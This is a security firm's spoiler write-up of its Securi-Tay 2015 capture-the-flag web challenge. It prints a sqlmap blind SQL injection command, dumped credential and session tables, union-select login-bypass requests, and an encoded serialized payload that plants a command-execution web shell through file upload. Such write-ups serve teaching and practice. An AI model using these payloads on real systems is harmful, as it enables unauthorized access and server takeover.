Securi-Tay 2015

Pentest were pleased to sponsor Securi-Tay IV at Abertay University on 27th February 2015. Thanks to everyone who took part in the challenge at Securi-Tay IV. We hope you enjoyed it. Nobody quite succeeded in breaking the challenge at the event, but one team was very close, so congratulations to them.

If you want to have a go at the challenge, it can be found online at along with a few hints. The challenge was designed to be difficult, so best of luck to anyone attempting it. If you are going to attempt the challenge, stop reading now! There are spoilers below.

1. Blind injection, Dump Database

The app consists of a username/password authentication. First we establish that the log in is vulnerable to SQL injection. Once SQL injection vulnerability has been established, the objective is to extract the database. We use the following query:

sqlmap --data
"username=admin&password=sdd'and(0)like(0)escape(case(1)when (1=1*)then(1)else(12)end)-- -" -p "username" -u "http: //" -D securi-tay-20 15-cms -T auth --dump

We extract the authorisation table and the users table:

Database: securi-tay-2015-cms
Table: auth
[2 entries]

ID PHPSESSID Username Settings Password
1 b6f51b9i1v1n9jsk76g8mi9n62 admin dXNlcmF1dGhfbG9naW58czoxOiIxIjs= d41d8cd98f00b204e9800998ecf8427e
2 b6f51b9i1v1n9jsk76g8mi9n62 root dXNlcmF1dGhfbG9naW58czoxOiIxIjs= d41d8cd98f00b204e9800998ecf8427e

Database: securi-tay-2015
Table: users
[1 entry]

SID Pass Salt Login
10t39dbpgiglr3tr955cr9dlg5 9fad885f781ff531fd43550cbd2318e6 blank admin

2. POST Request

Using the extracted SQL data, the next step is to construct a valid SQL query which will return a valid result for the authentication SQL query.

POST username=1' union select 1,2,3,4,'dXNlcmF1dGhfbG9naW58czoxOiIxIjs='-- -&password=1

Notice that the cookie PHPSESSID value has changed to "4" in your browser.

Base64 decodes:




3. Download the CMS

4. Access the login screen

Access and set the session id in your browser to the extracted "eaoiqaujfo3c16tqvjarukbrr7"

Next you need to construct a string which will be recognised as valid. You can create a valid serialised string using your own IP address. For example, if you Base64 encode the IP address:


you create the string:


Construct and send the post query to the CMS and exploit the share hosting session poisoning issue:

POST username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoyMDoi YWRtaW4tOTAuMjQ0LjE1Ny4yMTIiOw=='--

Replace '4' with the session id extracted from the current id being presented at

POST username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoxOiIx Ijs='--

5. File upload

This was a bonus challenge created for those who managed to complete the main challenge.

username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5', '<session><id>any</id><value> TzoxODoiVXNlckF1dGhlbnRpY2F0aW9uIjoxOntzOjY6ImNvbmZpZyI7YTozOntz Ojg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6Imhhc2giO3M6NDoiZXhlYyI7 czo4OiJwYXNzd29yZCI7czo4NToiZWNobyBQRDl3YUhBZ2MzbHpkR1Z0S0NSZlIw VlVXeUpqYldRaVhTa2dQejQ9IHwgYmFzZTY0IC0tZGVjb2RlID4+IC4vdXBsb2Fk cy90bXA4LnBocCI7fX0= </value></session>' -- -&password=1

The winners

The prize was a set of Beats® wireless speakers, plus a bonus prize for anyone who succeeded in uploading a file to the app.

The winning team consisted of:

  • Scott Glossop
  • Matt Robey
  • Congratulations to both.

    arrow moreSteelCon 2015

    B-Sides Manchester 2014arrow more

    Security Services

    Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.

    read more arrow more

    Database Services

    Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.

    read more arrow more

    © Copyright Pentest Limited 2001 - 2017 All Rights Reserved. Privacy statement